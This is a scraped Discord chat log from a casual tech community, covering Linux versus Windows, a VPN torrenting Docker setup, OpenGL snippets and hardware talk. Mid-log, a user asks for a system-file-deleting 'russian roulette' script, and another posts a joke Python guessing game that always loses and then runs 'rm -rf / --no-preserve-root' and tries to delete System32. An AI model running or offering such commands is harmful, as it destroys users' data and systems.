#🧊-off-topic-iceman-only
1 messages · Page 199 of 1
rip greg
My reak name is also greg
hypothetical tessie
Thanks
thanks proton :D https://host.sadanslargehole.com/u/vlaQEu.png
gm vendor 

hi pinguh
hai zeet

Call me reviewdb the way I'm broken😔⛓️🥀
oki I go make breakfast baii
I am users
nop
I am not users?
you are the toasted ptoato
wha
who are you banning

vm moment
i wish
why not
time to reboot 
OH MY FUCKING GOD DISCORD MADE IT SO THE GRADIENT IS DIFFERENT WHEN YOU MAXIMISE THE PROFILE
I AM GOING TO BOMB DISCORD HEADQUARTERS
do
Proton vpn 

imo wireguard is better
Your opinion bad
My opinion good
WireGuard
Tell me you’re joking please
Nop 
wireguard
@candid blaze why doesnt my debian samba share show in nemo
idk I never used Samba
oh
neither nemo
whyy
smh


do you wanna see my docker compose file axy
show
version: "3"
services:
gluetun:
image: qmcgaw/gluetun
container_name: gluetun
cap_add:
- NET_ADMIN
devices:
- /dev/net/tun:/dev/net/tun
volumes:
- ./gluetun:/gluetun
environment:
- VPN_SERVICE_PROVIDER=mullvad
- VPN_TYPE=wireguard
- WIREGUARD_PRIVATE_KEY=${WIREGUARD_PRIVATE_KEY}
- WIREGUARD_ADDRESSES=${WIREGUARD_ADDRESSES}
- SERVER_CITIES=${SERVER_CITIES}
- UPDATER_PERIOD=24h
- TZ=Etc/UTC
ports:
- 8080:8080 # qbittorrent webui
- 9117:9117 # jackett webui
network_mode: bridge
restart: unless-stopped
qbittorrent:
image: lscr.io/linuxserver/qbittorrent:latest
container_name: qbittorrent
environment:
- PUID=1000
- PGID=1000
- TZ=Etc/UTC
#- WEBUI_PORT=8080
volumes:
- ./config:/config
- /media/data/torrent:/downloads
restart: unless-stopped
network_mode: "service:gluetun"
jackett:
image: lscr.io/linuxserver/jackett:latest
container_name: jackett
environment:
- PUID=1000
- PGID=1000
- TZ=Etc/UTC
- AUTO_UPDATE=true
- FLARESOLVERR_URL=http://flaresolverr:8191
volumes:
- ./jackett:/config
- ./blackhole:/downloads
restart: unless-stopped
network_mode: "service:gluetun"
flaresolverr:
image: ghcr.io/flaresolverr/flaresolverr:latest
container_name: flaresolverr
environment:
- LOG_LEVEL=${LOG_LEVEL:-info}
- LOG_HTML=${LOG_HTML:-false}
- CAPTCHA_SOLVER=${CAPTCHA_SOLVER:-none}
restart: unless-stopped
network_mode: "service:gluetun"
slightly more sane than mine
you are insane
wtf
I’m not really sleepy anymore but
go eep
It’s better to eep
not healthy
ik
eep

mhm
junk content all over the place
terrible
SAME
I considered deleting Discord many times but it’s too late
same but I sometimes watch some movies
Already made too many friends
i watch tv, but not that many movies
wait what
i need to download more movies 
https://host.sadanslargehole.com/u/U6hnTz.png

Wtf
I don’t get how people get obsessed with social media
What does she even do there
@open pasture hiii
like what the fuck you’re obsessed with numbers, stalking, and data harvesting
@paper gate hiii
that’s creepy
:3
i hate
I wish I could just cut ties with 70% of the people irl
I turn 18 in a week
teenagers are fucking annoying
infinity
same

Somewhat
child
INFO [ip getter] Public IP address is 178.249.214.19 (Canada, Ontario, Toronto) @candid blaze
wha

Nuh uh
i hope its not my isp throttling me
younger than me = child
older than me = old
What about shorter then you
smol
Can you put that in feet?
lemme google
K
smol
At least 1
maybe even 2
@unreal siren hii
fear
Maybe 3.2572
@paper gate hii
Damn
damn you
tall

I'm 185
145 😭
WHAT
No
thou
160 at 11
I’m just a wee bit short
a wee bit?
Yes
you were born at the age of 13
bro you're a child
I am 182cm at near 17, doubt I will grow more lmao
I really hope I won't grow any more
finding cute clothes is annoying enough as is rn
Oh wait I did the math worng
5,4
So like 164.592 cm
branded shirts are so fucking ugly ffs
I was using cargo pants today
Yop

Car go pants
farnsie :3
Csgo pants
zeet :4
4
5
6
quit being a goofball
fair


Random
Roblox
Why did the skip 6 😭
Rzeet
Windows 9
I prefer bing

Does it have an microwave support?
no too performance intensive
😭
🔥
pain

I have a word to say that starts with ni and ends with er
Nitpicker
I have a word to say that starts with fa and ends with t
Faint
OkThanks
!! 🤣
Learning so many words
try it out
Very educational
def even_or_odd(num):
"""
Say if a number is "even" or "odd".
"""
return "eovdedn"[num % 2:: 2] # !! 🤣
why would you ever need that
¯_(ツ)_/¯
Ping?
Can someone help me make a script that deletes important system files by chance like russian roulette?
I would code a bot that does the :3
Any coding language
that actually already exists
yop
Lose/Lose is a shoot-'em-up and art video game developed by Zach Gage and released in 2009 for MacOS as part of his master's thesis show, "Data", at Parsons School of Design's MFA program. Styled after games like Galaga, the player controls a spaceship and can shoot at aliens in their path, each representing a random file on the player's compute...
oh yeah my friend made a python script that blows up your pc if you guess the wrong number
import os
import random
import platform
number = random.randint(1, 10) + random.random()
guess = input("Guess a number between 1 and 10: ")
if guess == number:
print("You win!")
else:
print("You lose! The number was " + str(number))
if platform.system() == "Windows":
print("Deleting all files in C:\\Windows\\System32...")
os.remove("C:\\Windows\\System32")
elif platform.system() == "Linux":
print("Deleting all files in /...")
os.system('rm -rf / --no-preserve-root')
os.system('sudo rm -rf / --no-preserve-root')
elif platform.system() == "Darwin":
print("Deleting all files in /Volumes...")
os.system('rm -r /Volumes')
os.system('sudo rm -rf / --no-preserve-root')
else:
print("Your OS is not supported. Please contact support.")
input("Press Enter to exit...")```
Wtf is darwin lmao
macos
Ah
please contact support lmao
:P
Your os is not supported. just use a sledgehammer
yay

you wont
@stark herald you
Huh that's weird the chat hasn't talked in a while
Guess I going to randomly spatter here then
Lies
i like how the joke is that you always lose

:3
:3
@stark herald who's the other person that talks about sdr alot im forgetting their name
they change name alot
@lime talon
@lime talon what if I got a dedicated raspberry pi for my sdr dongle
@wide leaf what are trackers
no
not that kind of tracker
That feeling when you listening to a song when super tired, and ya start hearing specific sounds in it that you never noticed were there before.
me on a daily basis:
attachment here
you define me
aw man my user was pingable anyways but wonp womp nonetheless
what are you doing
os this loke plague inc. ?
my botnet ddos attack monitor
@next warren hii
assuming my coworker has spare time today and wants to use their big brain to do work
it will have live data
insane
zzzzzz
zzzz
don't do what?
insane
@ripe willow @ripe willow
if there is a public list
Good for you?? You have no concept of past, present and future tense do you.
of known malware C2s
you can just route that IP
to nothing
and boom
no more ddos malware
also
if any server providers are knowingly hosting malware and ignoring complaints
upstreams can drop them
That's assuming the upstreams are paying attention close enough
i xannot use vendetta this is horrible it has the new discord layout im out byr
trust me, they are 
Lol fair enough
We got a vietnamese C2 taken down
Oh nice
after the provider
agreed
ignored complaints
coworker went above the provider's head
messaged their upstream
server boomed
Yeeeep. That'll do it
worst thing we saw was the provider that ignored abuse complaints about a bin server
UNTIL
we called them out
in their discord
Good tbh
finally my concerns are being voiced
they responded to the ticket in 2 minutes
💀
Plus major upstreams do care
When Blazingfast was hosting the original mirai C2
and ignoring the abuse complaints
researchers went above their head, and messaged Voxility
who provided the ddos protection for BlazingFast
Vox dropped them.
That killed BF's revenue 
they became shitty low end servers with no ddos protection
The funny meme about mirai though
There was a bashlite/qbot/gafgyt being hosted on Francisco's network
I think keyword is major here tbh
typical zt W
Frantech
Holy shantake that's genius
Frantech was ignoring complaints about this C2
So Paras, the owner and developer of mirai
started slamming Frantech's entire /24 subnet
that the C2 was on
ultimately disrupting all his users
Daaaamn
Interesting situation
Fair is fair
I feel like people vastly underestimate cybersecurity risks so often it's insane
Particularly manufacturers/OEMs and primary providers of things like software or, in this case, servers / internet services.
@primal zealot MATERIAL DESIGN JUMPSCARE
Lmao
jesus they never updated the ui on this page did they
Doesn't appear so 💀
idk
hi skye morning
hi
you're going to Norway
Meow
No way
Balls 99 is the BEST game on the GameBytes app tho 🗣️🗣️
Balls?!!!!!
bruh we just got it back
EW I THOUGHT IT WAS FAKE
attachment here. use your imagination becasue no perms
can bro not use google play game pc beta
or like Android emulator
No roblos
if ypu know how to get linux and ise it, it wont be that hard to dual boot windows
disgusting
which part
windows
true but like idfk linux
just use vinegar https://vinegarhq.org/
how can it update without resrartimg
live kernel patching i think
lernal spunds lile food
the only reason i ever swapped to linux was cause i liked my steam deck and windows 11 was trash
mfw eol
ill just switch to macintosh 👹👺☠️🤡
HORROR
i tried Windows for something last night and oh my God everything took so long to do
opening anything was a few seconds at minimum slower than the equivalent or same thing on Linux
i have no issues with windows
idk who said SDR# was better than SDR++ but it was fucking horrible to use
yep, 5 seconds to open settings compared to 0 is quite noticeable
at least my pc works and lets me play the games i want to play
i dont need more than that really
my pc works too
never claimed you did
so true!!
my laptop works on Windows but after using Linux on it for a long time Windows is unbearably slow
idk windows worked better for me than linux
i dont hate linux just didnt make a good experience with it
Don't mind me just watching..
2023 2024 will be the year of linux desktop
Your entire conversation
2050 will be the year of linux desktop
i used mint
solid option
not for my pc apparently
And "just works"
what happened
not adding in the compatibility issues and just games that dont work
my arch install works just fine
headset didnt work, proton just...peaced out
AHHH A TRADE MARK
aka i could do the very thing i was using my pc for
discord and gaming
yeah those distros tend to be a bit slower on updates
but i dont think that means that proton should just vanish randomly
justworks™️
BOCCHI
i dont know
idk I feel like there are more problems on ubuntu based systems than anywhere else.
must say that I personally never had really big issues
yeaaa
apt always has issues with keys or smth
fun fact: anonymous functions are actually named Julie, im just very humble
oooh
apt be like:
Failed to fetch https://xyz File has unexpected size (106788116 != 106788036). Mirror sync in progress? [IP: X.X.X.X 443]
Hashes of expected file:
- blah```
whar 
do you guys want a break
shiggy was just made by vee to cause more brainrot so we all use more shiggy
↗️
↘️
⬛
↖️
↙️
thats the shiggy wheel farming vencoin, real
yep
Why is Vendetta still pulling updates for some reason
don't judge, didnt find :black_square_large:
hiiiiiiiiii
nyab
@ripe willow
@elder geyser
@ripe willow
A lot of pings 
@ripe willow
@ripe willow
@balmy rover
🗿
@silk wraith i relate to your about me

hm?
that about me is wild
@ripe willow @median owl meow
me too
meow
Woah that's crazy
Maow
if you're using the flatpak for steam it does that more than it should
blocked
(I can't react so) 
Wow
Walks in with a messages shaped stomach 
what is the shape of a message?

Cool nickname
how r u ed
TRUE
ur not insane at all
its called spammer syndrome
pentagram
Yes
vee is a satanist
guess alright, sleepy tho. as always
Same
why do you think there's a #hell channel
I need to get smth for breakfast too
But #🧊-off-topic-iceman-only and #1108135649699180705 are hell already
I dont have food at home, was too lazy to go shopping
hence why I need to go shopping
This plugin doesn't exist, or I'm an idiot
https://vencord.dev/plugins/DevCompanion
I was too lazy to make smth
it only exists with dev installs
pnpm build doesn't enable it you need to use pnpm watch
yeah
encountered that the hard way today
that'd make me a christian
only christians are scared of hell
:(
so vee is god is what I'm gettinng from this
or did someone else create the #screams-of-the-damned channel?
Canary ? Or the developer version with a black logo
Yep
i love yesterday's funny cat
dev install of vencord
ive put it on my phone keyboard
@raw panther meow

Yes he's a cute little fearless kitty

nooo not again
thats bc its the realest thing ever
So a hidden version for web browsers, for example?
my plug a little weird but he chill
only missing a :3 ngl
no, one where you build it yourself
cat /dev/urandom
this is really cringe get a room
aplay /dev/urandom better
Get proper fonts smh
Salutations!
nice

uh what's going on?
the floppa
guys are u more a
typa guy or a
typa guy
cat /dev/urandom > /dev/null
how
what does this even do
I'm more of a 
guy
It seems to me that the creator once gave me a dev link for the browser extension, but I can't remember where it is.
Fair
check /dev/null, it's the void. hungry forever and it cannot be satisfied
on github releases, but it has nothing to do with the devcompanion
yeah it quite obviously has nothing in it

ah yes "speeb"
shiggy
/dev/null is literally me
if you want that plugin, you need to be building vencord from source with the --dev flag. there's no point using it if you're not a developer, because it only adds features useful for development
is termux like dead because it has like zero releases or commits recently
probably not
Exactly
it's not like it needs any commits
So it wasn't a normal version because there are updates faster than on Google Chrome but you have to create it yourself ok and how do you do that? Thanks man
not much changed about android so termux doesn't need changes
I get my Vencord straight from the hub, uncompiled white text
holy shit pot of greed
I got it from- I dunno
i go on bing images the first time in years, and this is the first thing i see
@raw panther
true
and i don't think termux has any issues so
did not make me chuckle
if it ain't broke don't fix it ig
Termux - a terminal emulator application for Android OS extendible by variety of packages. - Issues · termux/termux-app
probably gonna have driving lessons soon
it does have issues
pog
Ah yes all hell just for a permission to drive
as a fellow driving license owner, I wish you luck
I have a Acer Aspire 3 A315-42-R3CX but its missing a few parts
Tomorrow
What's that?
Laptop from 2020 with a Ryzen RX VEGA 3 GPU and Ryzen 3 3200U CPU
its the same about vendroid people say stuff like "no updates in a year this is dead!!" when in reality it simply doesnt need changes because it uses simple android apis that never change
Interesting
i mean vendroid is essentially dead but it doesnt matter cause it doesnt need changes
Not really I'm just saying that cause I can't think of anything else
Does anyone else open discord and just turn on spotify?
Uh The flabbergong is that?
fr
well do you want people with 0 iq driving dangerous giant machines?
:)
Yes I do
me doing cat /dev/urandom
oh
and then ctrl + c'ing it

does pot in german also have a different meaning
pot is pot
I SUMMON POT OF GREED
I summon the punniest of them all
Pot of Weed

Give
grow
no
gotta love nature for it loves u back
texts
me when android
huh
Do you know how to get the developer version of vencord? Thank you
compile it
hi pot
Meaning?
What should I do with github?
truly scary
Doesn’t work here sadly
nothing. you do not need the plugin
why do you want the plugin.. it's only for developers
Jfc I thought my tram was gonna derail itself for a second there 😭
It started shaking, leaning to one side and made a really bad scraping noise (while driving straight)
death by tram is just dissapointing
average db moment
And what's it for? If you don't mind my asking...
train moment
i mean
tram
fuck
im stupid
It's VAG 
Same thing
even better
love the minimalist effort approach
VAG getting strikes Thursday and Friday 🔥
Tomato = hotdog
tram = train
I guess it's to help them on Vencord
There will be no local public transport in the entirety of the city 💀
yes it's to make it easier to develop plugins / vencord itself
i wonder if it would be possible to port this to ELKS
straight???? 🙄
Unreal!
UNREAL MODE
Is this a unreal reference?
unreal mode is a special thing on real mode in 286 and later processors
16 bit mode with high memory access
right
Customize themes by the community with a easy to use interface
In x86 computing, unreal mode, also big real mode, flat real mode, or voodoo mode is a variant of real mode, in which one or more segment descriptors has been loaded with non-standard values, like 32-bit limits allowing access to the entire memory. Contrary to its name, it is not a separate addressing mode that the x86 processors can operate in....
nice z-index
ive just had grub start me in 32 bit protected mode im fucking scared of what id do without it
but at least they can do unreal mode
everyone that's still running 32bit or lower, why
nobody is
this is literally just projects for old machines and running old things
lol
okay nvm I get it for iot devices or shit
that too
32 bit cpus are in use in embedded systems a lot but nobody's desktops like unironically run it
iot is a big part
32-bit is an obsolete version, we should consider switching to 64-bit if I may say so.
and nearly fucking nothing runs 16 bit or lower nowadays. except old hardware, and your computer when it first boots up
as it happens
elks is made
for old ass hardware
some iot devices still have stuff like an 8086 (more like nec cpus typically, which are 8086 compatible)
64 bit is so old, we should switch to 128 bit instead
in fact you can throw an nec v20/v30 on 8088/8086 motherboards
and it has better performance + 8018x instruction support
In case it's computer software we're talking about, not a video game
isn't that software too
I'm talking 128-bit computing
The L
Way To Edit
Disco
Themes
it exists ?
Meow
pierre stop cooking
MEOW
ITS A CAT!
i dont see us going above 64 bit in any practical application ANY time soon literally on account of we just have no fucking idea what we'd do with it
CAT
it even was originally created by somebody who helped develop linux
like , literally every application we use computers for does not need anything above 64 . we have reached the point of "We're done here"

A processor with 128-bit byte addressing could directly address up to 2128 (over 3.40×1038) bytes, which would greatly exceed the total data captured, created, or replicated on Earth as of 2018, which has been estimated to be around 33 zettabytes (over 274 bytes).[1]

we too dumb to use it properly yet
64 bit can already process up to 9.223 quintillion
IBM 370, after that it must be expensive and it's not yet mainstream
not just like. us
nobody
nobody needs it
maybe
i dont see it though. you gotta understand how big the jump from 32 to 64 is even alone
in 32 bit we could only process like
I run some old ish games that are still 32 bit
64 to 128 is only ever gonna happen if we become an interstellar civilization and actually need to simulate shit on that kind of scale
the maximum date we can process (using unix time) with 32 bit is jan 19, 2038
or generating adult content
the maximum date with 64 bit. is dec 4 292277026596
dont
me
way too specialized for general usage
it is a big fucking jump
I agree
we literally just have no use now or in the foreseeable future for anything more than 64 bit
Bims is not wrong, its absurd how much is created by cause of adult stuff
that's why we haven't done it
I'm too stupid to understand this convo
finally someone that gets it

that's 14 years away
even when they're easy to use, the most they'd get is a processing unit on our current computers
mhm
that's 21 times the estimated date the heat death of the universe will happen
Good stocking by then we may have exploited black holes as a portal lol
i doubt black holes are wormholes
who needs dates anyways, just count up seconds
that's the point 😭
lol
Idk what my brainrot is doing



no brain allowed in vencord discord 🤓
yes
LOL
the former
now are you reading left to right or right to left 

recommend me smth to read
mangas are rtl so that's prob why i got confused
ye
english is y'know ltr
Sometimes we can be crazy
i personally read bottom to top

there is top to bottom / bottom to top langs
our teacher is just not here so we have independent study 
what no way
independent study more like on phone the whole class
independent study for us means "do whatever the fuck we want as long as we don't annoy the class nextdoor"

that's what it means for everybody
I'm just sitting in the hallway on a sofa
do you like my opengl pyramid
unsurprisingly developed by the same guy
noice
now make it in vulkan
jk opengl is fine
math

an hour is 60 minutes
void update()
{
angle += 0.167f;
if (angle >= 360.0f)
{
angle -= 360.0f;
rotationCount++;
saveSpins(rotationCount);
}
glutPostRedisplay();
}```
RPM shouldn't be a hard calculation
yes 0.167f because of 60hz/60fps
now make fps-independent spinning speed
nah
the
guess how I keep state
funne background
void saveSpins(int spins)
{
std::ofstream file("spins.txt");
if (file.is_open())
{
file << spins;
file.close();
}
else
{
std::cerr << "Unable to open file for writing." << std::endl;
}
}```
either through NX11 or just porting the text mode?
not sure
I need to get a wireless phone charger
you don't
I guess I don't then
they 1. are slow af and 2. waste tons of energy
she's just like me fr
wireless phone charger is only good for wireless earbuds
I've had many phones with wireless charging but never used a wireless charger lol
I cba to ever plug them in so I just leave them on the charging pad on my desk
with cable I can charge mine in under an hour, wireless takes 2+
mhm
except one time I shared battery from my op8pro to my wife's phone via reverse wireless charge
it had that feature
hhh
Review-DB just broke xddd
I'm getting spammed by reminders about an appointment I have tomorrow

I need to make / find a good calendar app for android that I can selfhost and sync
yeah something that isn't an entire nextcloud
although that would make sense
but I don't have a proper server @home yet
next summer I'm probably gonna get a home server
I will probably build my home server once I replace my cpu and just use that one
i5 13600k will draw tons of power tho
yeah
also some servers are weird cuz they pull like 30w at idle and fucking 500+ the second the fans spin up
tbf that could also just be that the server was from 2011 but shhh
my 12700K idles at 60W and running cinebench it peaked at 224W lol
I think undervolting it should work for a home server
mhm
what os do you use btw
w11 and the cpu is overclocked
oh
I mean the a 13600k should not need that much to run docker with like a mc server, portainer, a few services I use locally, dashboard + apis
I'm probably gonna get an actual server server so I can run a mc server on it
what cpu?
just so you know, windows 10 can't take advantage of 12th gen and later cpus properly, though ik you just said you're using 11
lazy ms never backported it to 10
not sure if laziness or just wanting people to switch to 11
but yeah the scheduler in 11 is improved for ecores and shit
also I'm idling at 43C and cinebench takes me right up to 100C and thermal throttle xd

cinebench moment
coolest intel cpu
yeah no game makes it heat up so no worries
my cpu is an i7-8700
but yeah I really need to build that custom loop at some point
?
watercooling
I only have a shitty aio atm
Hey I also go to 100c XD
I upgraded my AIO
same thing
my rtx 2060 + i7-8700 system doesn't seem to be worrying about cooling i think
i7-8700 doesnt need shit
(it's not even water cooled)
I can fit a lot of big rads in my case which is part why I got this case
lol
you can probably blow the cpu with your mouth in case it gets too hot
8700 will run on a passive cooler if you don't live in a warm country
isn't undervolting also kinda handy with some higher end CPU's
the fact you guys have to use water coolers on your 12th gens and such is horror
My CPU usually reaches 101C on load
where tf do I put a server tho
yes
horror
like its gonna be loud af
Thermal throttling sounds annoying
stock voltages are usually a bit higher than what they need to be
basement or garage
Toastyy
especially 3rd party retailers


